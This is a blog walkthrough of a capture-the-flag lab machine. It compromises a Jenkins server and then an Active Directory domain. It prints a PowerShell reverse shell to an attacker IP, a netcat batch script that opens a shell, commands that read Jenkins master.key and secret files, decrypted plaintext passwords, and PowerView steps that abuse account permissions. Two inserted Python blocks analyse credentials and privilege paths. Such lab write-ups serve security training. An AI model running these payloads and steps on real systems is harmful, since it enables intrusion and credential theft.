Grav3m1ndbyte's Blog

Object

Completed on October 11, 2022


Overview

This machine gave me another opportunity to explore how an application such as Jenkins can be leveraged to compromise the system, the environment, and even a domain. In a nutshell, only the Jenkins documentation plus a bit of research was needed to gain access, and PowerView plus some Active Directory knowledge to compromise the environment.

References

Enumeration

Service Enumeration

Just like in every scenario, we need to get to know our target better. We do this by finding the open ports on the host and then enumerating each service.

Finding Open Ports:

┌──(kali 👿 kali)-[~/…/Object]
└─$ sudo nmap -e tun0 -Pn -sS -p- --min-rate=1000 --min-parallelism=100 -T5 object.htb -oA Object_OpenPorts
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-10 09:59 EDT
Nmap scan report for object.htb (10.129.96.147)
Host is up (0.11s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
5985/tcp open  wsman
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 116.46 seconds
                                                                                                                    
┌──(kali 👿 kali)-[~/…/Object]
└─$ sudo nmap -e tun0 -Pn -sS -sC -sV -p 80,5985,8080 --min-rate=1000 --min-parallelism=100 -T5 object.htb -oA Object_PortScan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-10 10:02 EDT
Nmap scan report for object.htb (10.129.96.147)
Host is up (0.12s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft IIS httpd 10.0
|_http-title: Mega Engines
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8080/tcp open  http    Jetty 9.4.43.v20210629
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
|_http-server-header: Jetty(9.4.43.v20210629)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.31 seconds
[1]    519316 segmentation fault  sudo nmap -e tun0 -Pn -sS -sC -sV -p 80,5985,8080 --min-rate=1000  -T5  -oA 

HTTP (TCP 80) Enumeration:

While evaluating what is hosted on TCP 80, we find an email address (ideas@object.htb) that likely reveals the domain name in use.

It also contains a hyperlink to the application hosted on TCP 8080: Jenkins.

HTTP (TCP 8080) Enumeration:

The registration page is enabled, so we go ahead and create our tester:test123 account.

In the user configuration page, we can create an API token: 192141ae5ce890dd441ab1338a0fe5e8f

This is required to trigger jobs remotely.

As we don't have any other permissions here, we can create projects but not build them from the UI; the job configuration does, however, offer a remote trigger:

“Use the following URL to trigger build remotely: JENKINS_URL/job/Testing/build?token=TOKEN_NAME or /buildWithParameters?token=TOKEN_NAME”

As the build step to trigger, we use 'whoami /all' for testing purposes:

To trigger the job, we use curl with the URL sample given above:

┌──(kali 👿 kali)-[~/…/Object]
└─$ curl -vLkX GET --url 'http://object.htb:8080/job/Testing/build?token=tester' --user 'tester:1192141ae5ce890dd441ab1338a0fe5e8f'
Note: Unnecessary use of -X or --request, GET is already inferred.
*   Trying 10.129.96.147:8080...
* Connected to object.htb (10.129.96.147) port 8080 (#0)
* Server auth using Basic with user 'tester'
> GET /job/Testing/build?token=tester HTTP/1.1
> Host: object.htb:8080
> Authorization: Basic dGVzdGVyOjExOTIxNDFhZTVjZTg5MGRkNDQxYWIxMzM4YTBmZTVlOGY=
> User-Agent: curl/7.85.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 201 Created
< Date: Mon, 10 Oct 2022 15:43:14 GMT
< X-Content-Type-Options: nosniff
< Location: http://object.htb:8080/queue/item/1/
< Content-Length: 0
< Server: Jetty(9.4.43.v20210629)
< 
* Connection #0 to host object.htb left intact

Successful Trigger:

And its output:

Gaining Access

Given that we can execute commands through the job, we attempt to gain access by executing a PowerShell reverse shell.

Payload: powershell.exe -NoP -NonI -W Hidden -sta -ep bypass -Command 'Set-ExecutionPolicy Bypass -Scope CurrentUser;$client = New-Object System.Net.Sockets.TCPClient("10.10.14.117",1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

But no luck:

We tried to get creative, for example using PowerShell to pull a script containing the same reverse shell payload, but we only got an 'unable to connect to the remote server' error. So at this point, we need to do some research.

It turns out Jenkins stores its encrypted credentials locally, readable without admin access, under the directory set by the $JENKINS_HOME variable (that is the variable name on a Linux host). In this case, it is 'C:\Users\oliver\AppData\Local\Jenkins', as the error above gave us the path.

  • $JENKINS_HOME/credentials.xml: This file holds the encrypted credentials

  • $JENKINS_HOME/secrets/master.key: This file decrypts hudson.util.Secret

  • $JENKINS_HOME/secrets/hudson.util.Secret: This file decrypts credentials.xml entries and it is itself encrypted.

Through a few more job runs we find that this directory contains two user directories, one for the admin user and one for 'tester'. Instead of a credentials.xml file (I was expecting a file with this name), we find a config.xml file that contains the encrypted credentials, as shown below:

<?xml version='1.1' encoding='UTF-8'?>
<user>
  <version>10</version>
  <id>admin</id>
  <fullName>admin</fullName>
  <properties>
    <com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty plugin="credentials@2.6.1">
      <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
        <entry>
          <com.cloudbees.plugins.credentials.domains.Domain>
            <specifications/>
          </com.cloudbees.plugins.credentials.domains.Domain>
          <java.util.concurrent.CopyOnWriteArrayList>
            <com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
              <id>320a60b9-1e5c-4399-8afe-44466c9cde9e</id>
              <description></description>
              <username>oliver</username>
              <password>{AQAAABAAAAAQqU+m+mC6ZnLa0+yaanj2eBSbTk+h4P5omjKdwV17vcA=}</password>
              <usernameSecret>false</usernameSecret>
            </com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
          </java.util.concurrent.CopyOnWriteArrayList>
        </entry>
      </domainCredentialsMap>
    </com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty>
    <hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty plugin="email-ext@2.84">
      <triggers/>
    </hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty>
    <hudson.model.MyViewsProperty>
      <views>
        <hudson.model.AllView>
          <owner class="hudson.model.MyViewsProperty" reference="../../.."/>
          <name>all</name>
          <filterExecutors>false</filterExecutors>
          <filterQueue>false</filterQueue>
          <properties class="hudson.model.View$PropertyList"/>
        </hudson.model.AllView>
      </views>
    </hudson.model.MyViewsProperty>
    <org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty plugin="display-url-api@2.3.5">
      <providerId>default</providerId>
    </org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty>
    <hudson.model.PaneStatusProperties>
      <collapsed/>
    </hudson.model.PaneStatusProperties>
    <jenkins.security.seed.UserSeedProperty>
      <seed>ea75b5bd80e4763e</seed>
    </jenkins.security.seed.UserSeedProperty>
    <hudson.search.UserSearchProperty>
      <insensitiveSearch>true</insensitiveSearch>
    </hudson.search.UserSearchProperty>
    <hudson.model.TimeZoneProperty/>
    <hudson.security.HudsonPrivateSecurityRealm_-Details>
      <passwordHash>#jbcrypt:$2a$10$q17aCNxgciQt8S246U4ZauOccOY7wlkDih9b/0j4IVjZsdjUNAPoW</passwordHash>
    </hudson.security.HudsonPrivateSecurityRealm_-Details>
    <hudson.tasks.Mailer_-UserProperty plugin="mailer@1.34">
      <emailAddress>admin@object.local</emailAddress>
    </hudson.tasks.Mailer_-UserProperty>
    <jenkins.security.ApiTokenProperty>
      <tokenStore>
        <tokenList/>
      </tokenStore>
    </jenkins.security.ApiTokenProperty>
    <jenkins.security.LastGrantedAuthoritiesProperty>
      <roles>
        <string>authenticated</string>
      </roles>
      <timestamp>1634793332195</timestamp>
    </jenkins.security.LastGrantedAuthoritiesProperty>
  </properties>
</user>
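To make the three-file relationship above concrete, here is an added Python example (not code from the walkthrough or from the Jenkins project) that inventories the credential objects in a Jenkins user config.xml and parses the stored secret envelope without decrypting it. The embedded XML is a trimmed copy of the admin file above, and the function and field names are my own.

```python
import base64
import hashlib
import struct
import xml.etree.ElementTree as ET

# Trimmed copy of the admin user's config.xml from the walkthrough (constructed input
# for this example; the credential id, username and password blob are the page's values).
CONFIG_XML = """<user>
  <id>admin</id>
  <properties>
    <com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty plugin="credentials@2.6.1">
      <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
        <entry>
          <com.cloudbees.plugins.credentials.domains.Domain>
            <specifications/>
          </com.cloudbees.plugins.credentials.domains.Domain>
          <java.util.concurrent.CopyOnWriteArrayList>
            <com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
              <id>320a60b9-1e5c-4399-8afe-44466c9cde9e</id>
              <description></description>
              <username>oliver</username>
              <password>{AQAAABAAAAAQqU+m+mC6ZnLa0+yaanj2eBSbTk+h4P5omjKdwV17vcA=}</password>
              <usernameSecret>false</usernameSecret>
            </com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
          </java.util.concurrent.CopyOnWriteArrayList>
        </entry>
      </domainCredentialsMap>
    </com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty>
  </properties>
</user>
"""

SECRET_FIELDS = ("password", "secret", "passphrase", "privateKey")
ENVELOPE_VERSION = 1      # first byte of a "{...}" secret blob
AES_BLOCK = 16
MAGIC = b"::::MAGIC::::"  # trailer Jenkins appends inside the legacy (ECB) format


def derive_master_aes_key(master_key_text):
    """master.key -> the AES-128 key that unwraps secrets/hudson.util.Secret.
    Jenkins hashes the hex *text* exactly as stored (no trailing newline) with
    SHA-256 and keeps 16 bytes. The first 16 bytes of the unwrapped
    hudson.util.Secret are in turn the key that protects the credential blobs."""
    return hashlib.sha256(master_key_text.encode("utf-8")).digest()[:16]


def parse_secret_envelope(value):
    """Describe a stored Jenkins secret without decrypting it.

    New format: "{base64}" whose decoded bytes are
        0x01 | iv_len (4 bytes, big-endian) | data_len (4 bytes, big-endian) | iv | AES-CBC ciphertext
    Legacy format: bare base64 of AES-ECB ciphertext (plaintext + MAGIC, PKCS#5-padded).
    Raises ValueError when the blob is not internally consistent."""
    value = value.strip()
    if value.startswith("{") and value.endswith("}"):
        raw = base64.b64decode(value[1:-1])
        if len(raw) < 9 or raw[0] != ENVELOPE_VERSION:
            raise ValueError("unknown secret envelope version")
        iv_len, data_len = struct.unpack(">II", raw[1:9])
        if len(raw) != 9 + iv_len + data_len:
            raise ValueError("envelope length mismatch: header %d+%d, body %d"
                             % (iv_len, data_len, len(raw) - 9))
        if data_len % AES_BLOCK:
            raise ValueError("ciphertext is not block-aligned")
        return {"format": "aes-cbc-v1", "iv_len": iv_len, "data_len": data_len,
                "iv": raw[9:9 + iv_len], "ciphertext": raw[9 + iv_len:]}
    raw = base64.b64decode(value)
    if not raw or len(raw) % AES_BLOCK:
        raise ValueError("legacy blob is not block-aligned")
    return {"format": "aes-ecb-legacy", "data_len": len(raw), "ciphertext": raw}


def inventory_credentials(xml_text):
    """List every credential object in a Jenkins config.xml with its secret fields parsed."""
    root = ET.fromstring(xml_text)
    found = []
    for elem in root.iter():
        # credential objects are the *CredentialsImpl elements, whatever their package
        if not elem.tag.endswith("CredentialsImpl"):
            continue
        entry = {"type": elem.tag.rsplit(".", 1)[-1],
                 "id": elem.findtext("id"),
                 "username": elem.findtext("username"),
                 "secrets": {}}
        for child in elem:
            if child.tag in SECRET_FIELDS and child.text and child.text.strip():
                entry["secrets"][child.tag] = parse_secret_envelope(child.text)
        found.append(entry)
    return found


if __name__ == "__main__":
    for cred in inventory_credentials(CONFIG_XML):
        for field, env in cred["secrets"].items():
            print("%s id=%s user=%s %s: %s, %d-byte ciphertext"
                  % (cred["type"], cred["id"], cred["username"], field,
                     env["format"], env["data_len"]))
```

For the page's blob the header says a 16-byte IV and 16 bytes of ciphertext, which matches a 13-character password padded to one AES block.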

Next, we need to find the other two files, and we use the following two commands:

  • type c:\Users\oliver\Appdata\local\jenkins\.jenkins\secrets\master.key

  • powershell.exe -c "$c=[convert]::ToBase64String((Get-Content -path 'c:\Users\oliver\Appdata\local\jenkins\.jenkins\secrets\hudson.util.Secret' -Encoding byte));Write-Output $c"

And the output of the job was:

Started by remote host 10.10.14.117
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\Testing
[Testing] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins11888946817563117290.bat

C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\Testing>cmd.exe /c "type c:\Users\oliver\Appdata\local\jenkins\.jenkins\secrets\master.key" 
f673fdb0c4fcc339070435bdbe1a039d83a597bf21eafbb7f9b35b50fce006e564cff456553ed73cb1fa568b68b310addc576f1637a7fe73414a4c6ff10b4e23adc538e9b369a0c6de8fc299dfa2a3904ec73a24aa48550b276be51f9165679595b2cac03cc2044f3c702d677169e2f4d3bd96d8321a2e19e2bf0c76fe31db19
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\Testing>powershell.exe -c "$c=[convert]::ToBase64String((Get-Content -path 'c:\Users\oliver\Appdata\local\jenkins\.jenkins\secrets\hudson.util.Secret' -Encoding byte));Write-Output $c" 
gWFQFlTxi+xRdwcz6KgADwG+rsOAg2e3omR3LUopDXUcTQaGCJIswWKIbqgNXAvu2SHL93OiRbnEMeKqYe07PqnX9VWLh77Vtf+Z3jgJ7sa9v3hkJLPMWVUKqWsaMRHOkX30Qfa73XaWhe0ShIGsqROVDA1gS50ToDgNRIEXYRQWSeJY0gZELcUFIrS+r+2LAORHdFzxUeVfXcaalJ3HBhI+Si+pq85MKCcY3uxVpxSgnUrMB5MX4a18UrQ3iug9GHZQN4g6iETVf3u6FBFLSTiyxJ77IVWB1xgep5P66lgfEsqgUL9miuFFBzTsAkzcpBZeiPbwhyrhy/mCWogCddKudAJkHMqEISA3et9RIgA=

C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\Testing>exit 0 
Finished: SUCCESS

Once we retrieve these files, we must convert the data from hudson.util.Secret back to bytes:

┌──(kali 👿 kali)-[~/…/Object]
└─$ echo 'gWFQFlTxi+xRdwcz6KgADwG+rsOAg2e3omR3LUopDXUcTQaGCJIswWKIbqgNXAvu2SHL93OiRbnEMeKqYe07PqnX9VWLh77Vtf+Z3jgJ7sa9v3hkJLPMWVUKqWsaMRHOkX30Qfa73XaWhe0ShIGsqROVDA1gS50ToDgNRIEXYRQWSeJY0gZELcUFIrS+r+2LAORHdFzxUeVfXcaalJ3HBhI+Si+pq85MKCcY3uxVpxSgnUrMB5MX4a18UrQ3iug9GHZQN4g6iETVf3u6FBFLSTiyxJ77IVWB1xgep5P66lgfEsqgUL9miuFFBzTsAkzcpBZeiPbwhyrhy/mCWogCddKudAJkHMqEISA3et9RIgA=' | base64 -d -w 0 > hudson.util.Secret
┌──(kali 👿 kali)-[~/…/Object]
└─$ /opt/pwn_jenkins/offline_decryption/jenkins_offline_decrypt.py master.key hudson.util.Secret credentials.xml
c1cdfun_d2434

Now we have the credentials for oliver:c1cdfun_d2434 and we can attempt to access the system through WinRM:

┌──(kali 👿 kali)-[~/…/Object]
└─$ evil-winrm -i object.htb -u 'oliver' -p 'c1cdfun_d2434'

Evil-WinRM shell v3.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\oliver\Documents> whoami
object\oliver

*Evil-WinRM* PS C:\Users\oliver\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\oliver\Desktop> ls


    Directory: C:\Users\oliver\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       10/10/2022   6:56 AM             34 user.txt


*Evil-WinRM* PS C:\Users\oliver\Desktop> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::13f
   IPv6 Address. . . . . . . . . . . : dead:beef::f8b8:c26c:96a:3a91
   Link-local IPv6 Address . . . . . : fe80::f8b8:c26c:96a:3a91%12
   IPv4 Address. . . . . . . . . . . : 10.129.96.147
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%12
                                       10.129.0.1
*Evil-WinRM* PS C:\Users\oliver\Desktop> type user.txt
1969db********************1e934b

Privilege Escalation

Local Enumeration

After finding the flag, we need to retrieve more information from the domain, so we proceed to get users, and local and domain groups:

*Evil-WinRM* PS C:\Users\oliver\Desktop> net user /domain

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    krbtgt
maria                    oliver
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\oliver\Desktop> net user maria
User name                    maria
Full Name                    maria garcia
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/21/2021 9:16:32 PM
Password expires             Never
Password changeable          10/22/2021 9:16:32 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   10/10/2022 6:56:45 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\oliver\Desktop> net user oliver
User name                    oliver
Full Name                    Olivar Ava
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/21/2021 2:23:12 AM
Password expires             Never
Password changeable          10/22/2021 2:23:12 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   10/10/2022 6:56:48 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\oliver\Desktop> net group /domain

Group Accounts for \\

-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\oliver\Desktop> net localgroup

Aliases for \\JENKINS

-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Account Operators
*Administrators
*Allowed RODC Password Replication Group
*Backup Operators
*Cert Publishers
*Certificate Service DCOM Access
*Cryptographic Operators
*Denied RODC Password Replication Group
*Distributed COM Users
*DnsAdmins
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Incoming Forest Trust Builders
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Pre-Windows 2000 Compatible Access
*Print Operators
*RAS and IAS Servers
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Server Operators
*Storage Replica Administrators
*Terminal Server License Servers
*Users
*Windows Authorization Access Group
The command completed successfully.

For further enumeration, we used Bloodhound:

*Evil-WinRM* PS C:\Users\oliver\Desktop> upload /opt/BloodHound/Ingestors/SharpHound.ps1
Info: Uploading /opt/BloodHound/Ingestors/SharpHound.ps1 to C:\Users\oliver\Desktop\SharpHound.ps1

                                                             
Data: 1297900 bytes of 1297900 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\oliver\Desktop> Set-ExecutionPolicy Bypass -Scope CurrentUser;Import-Module .\SharpHound.ps1;Import-Module .\SharpHound.ps1
*Evil-WinRM* PS C:\Users\oliver\Desktop> Invoke-BloodHound -CollectAllProperties -CollectionMethod All
*Evil-WinRM* PS C:\Users\oliver\Desktop> ls


    Directory: C:\Users\oliver\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       10/10/2022  10:36 AM           9139 20221010103651_BloodHound.zip
-a----       10/10/2022  10:36 AM          10043 MWU2MmE0MDctMjBkZi00N2VjLTliOTMtYThjYTY4MjdhZDA2.bin
-a----       10/10/2022  10:35 AM         973425 SharpHound.ps1
-ar---       10/10/2022   6:56 AM             34 user.txt

Of the users in this domain, only the built-in Administrator is a member of the Domain Admins group, and only through direct membership.

From our enumeration with BloodHound, we find the user smith, which appears to be a protected user whose details oliver cannot read. But oliver has the 'ForceChangePassword' right over smith. This means "The user OLIVER@OBJECT.LOCAL has the capability to change the user SMITH@OBJECT.LOCAL's password without knowing that user's current password."

In turn, maria has the 'WriteOwner' right over the Domain Admins group. This means "The user MARIA@OBJECT.LOCAL has the ability to modify the owner of the group DOMAIN ADMINS@OBJECT.LOCAL. Object owners retain the ability to modify object security descriptors, regardless of permissions on the object's DACL."

Why is all this important? Well, "The user SMITH@OBJECT.LOCAL has generic write access to the user MARIA@OBJECT.LOCAL. Generic Write access grants you the ability to write to any non-protected attribute on the target object, including "members" for a group, and "serviceprincipalnames" for a user."
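As an added example (not part of the original walkthrough), the same chain expressed as a small Python path analysis over the BloodHound edges described above: the kind of check a defender can run over exported ACL data to see which principals transitively reach Domain Admins and which single ACE severs every such path. The edge list is constructed from the findings above, and the function names are mine.

```python
from collections import deque

# Directed control edges as reported by BloodHound for this box, reconstructed here
# from the walkthrough (constructed input, not a BloodHound export).
# (source, right, target) means "source holds this right over target".
EDGES = [
    ("oliver", "ForceChangePassword", "smith"),
    ("smith", "GenericWrite", "maria"),
    ("maria", "WriteOwner", "Domain Admins"),
    ("Administrator", "MemberOf", "Domain Admins"),
]

# Why each right lets the holder take over the target.
RIGHT_EFFECT = {
    "ForceChangePassword": "reset the target's password without knowing it",
    "GenericWrite": "write non-protected attributes such as scriptPath or servicePrincipalName",
    "WriteOwner": "become owner, rewrite the DACL, then add members",
    "WriteDacl": "rewrite the DACL, then add members",
    "GenericAll": "full control of the object",
    "MemberOf": "ordinary group membership",
}
# Rights that are expected structure rather than a misconfiguration.
LEGIT_RIGHTS = {"MemberOf"}


def find_control_paths(edges, target):
    """Breadth-first search from every principal; returns {principal: [edges to target]}."""
    adj = {}
    for src, right, dst in edges:
        adj.setdefault(src, []).append((right, dst))
    paths = {}
    for start in {e[0] for e in edges}:
        if start == target:
            continue
        queue = deque([(start, [])])
        seen = {start}          # guards against cycles (e.g. mutual GenericWrite)
        while queue:
            node, path = queue.popleft()
            if node == target:
                paths[start] = path
                break
            for right, nxt in adj.get(node, []):
                if nxt not in seen:
                    seen.add(nxt)
                    queue.append((nxt, path + [(node, right, nxt)]))
    return paths


def dangerous_paths(edges, target):
    """Only paths that rely on at least one ACL right, not plain membership."""
    return {p: path for p, path in find_control_paths(edges, target).items()
            if any(r not in LEGIT_RIGHTS for _, r, _ in path)}


def choke_points(paths):
    """Edges present in every dangerous path: removing any one of them severs them all."""
    common = None
    for path in paths.values():
        common = set(path) if common is None else common & set(path)
    return common or set()


def describe(path):
    return " -> ".join("%s [%s: %s] %s" % (src, right, RIGHT_EFFECT.get(right, "?"), dst)
                       for src, right, dst in path)


if __name__ == "__main__":
    risky = dangerous_paths(EDGES, "Domain Admins")
    for principal, path in sorted(risky.items()):
        print("%s reaches Domain Admins: %s" % (principal, describe(path)))
    for src, right, dst in choke_points(risky):
        print("remediate first: remove '%s' granted to %s on %s" % (right, src, dst))
```

On the page's data the choke point is maria's WriteOwner on Domain Admins: removing that single ACE cuts off oliver, smith and maria at once, while the Administrator's path is flagged as legitimate membership.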

Checking the Remote Management Users group to see which users can log in over WinRM:

*Evil-WinRM* PS C:\Users\oliver\Desktop> net localgroup "Remote Management Users"
Alias name     Remote Management Users
Comment        Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.

Members

-------------------------------------------------------------------------------
maria
oliver
smith
The command completed successfully.

Account Modification

Modifying smith's password using PowerView:

*Evil-WinRM* PS C:\Users\oliver\Desktop> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\oliver\Desktop> $NewPassword = ConvertTo-SecureString 'test123' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\oliver\Desktop> Set-DomainUserPassword -Identity 'smith' -AccountPassword $NewPassword
Warning: [Set-DomainUserPassword] Error setting password for user 'smith' : Exception calling "SetPassword" with "1" argument(s): "The password does not meet the password policy requirements. Check the minimum password length, password complexity and password history requirements. (Exception from HRESULT: 0x800708C5)"
*Evil-WinRM* PS C:\Users\oliver\Desktop> $NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\oliver\Desktop> Set-DomainUserPassword -Identity 'smith' -AccountPassword $NewPassword

Testing modification:

┌──(kali 👿 kali)-[~/…/Object]
└─$ evil-winrm -i object.htb -u 'smith' -p 'Password123!'

Evil-WinRM shell v3.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\smith\Documents> whoami /all

USER INFORMATION
----------------

User Name    SID
============ ==============================================
object\smith S-1-5-21-4088429403-1159899800-2753317549-1104


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

*Evil-WinRM* PS C:\Users\smith\Documents> 

Now that we have access as smith, we will use netcat through a batch script to get a reverse shell as maria.

Custom batch script:

@echo off
start /b C:\Windows\Temp\nc.exe 127.0.0.1 1337 -e cmd.exe
start /b "" cmd /c del "%~f0"&exit /b

In PowerShell, we use PowerView to modify maria's account so that this script is set as her logon script:

*Evil-WinRM* PS C:\Users\smith\Documents> Import-Module .\PowerView.ps1

*Evil-WinRM* PS C:\Users\smith\Documents> Set-DomainObject -Identity maria -Set @{'scriptpath'='C:\Windows\Temp\shell.bat'}

As soon as we get a reverse shell thanks to this script, we can access all the files in maria's home directory, which contains an Excel spreadsheet with a list of passwords:

Testing maria's passwords and access:

To test these passwords, we will use crackmapexec:

┌──(kali 👿 kali)-[~/…/Object]
└─$ crackmapexec winrm object.htb -d object.local -u maria -p marias_passwd 2> /dev/null
HTTP        object.htb      5985   object.htb       [*] http://object.htb:5985/wsman
WINRM       object.htb      5985   object.htb       [-] object.local\maria:d34gb8@
WINRM       object.htb      5985   object.htb       [-] object.local\maria:0de_434_d545
WINRM       object.htb      5985   object.htb       [+] object.local\maria:W3llcr4ft3d_4cls (Pwn3d!)

Using Evil-WinRM to test:

*Evil-WinRM* PS C:\Users\maria\Documents> whoami /all

USER INFORMATION
----------------

User Name    SID
============ ==============================================
object\maria S-1-5-21-4088429403-1159899800-2753317549-1106


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.


*Evil-WinRM* PS C:\Users\maria\Documents> upload /usr/share/windows-resources/powersploit/Recon/PowerView.ps1
Info: Uploading /usr/share/windows-resources/powersploit/Recon/PowerView.ps1 to C:\Users\maria\Documents\PowerView.ps1

                                                             
Data: 1027036 bytes of 1027036 bytes copied

Info: Upload successful!

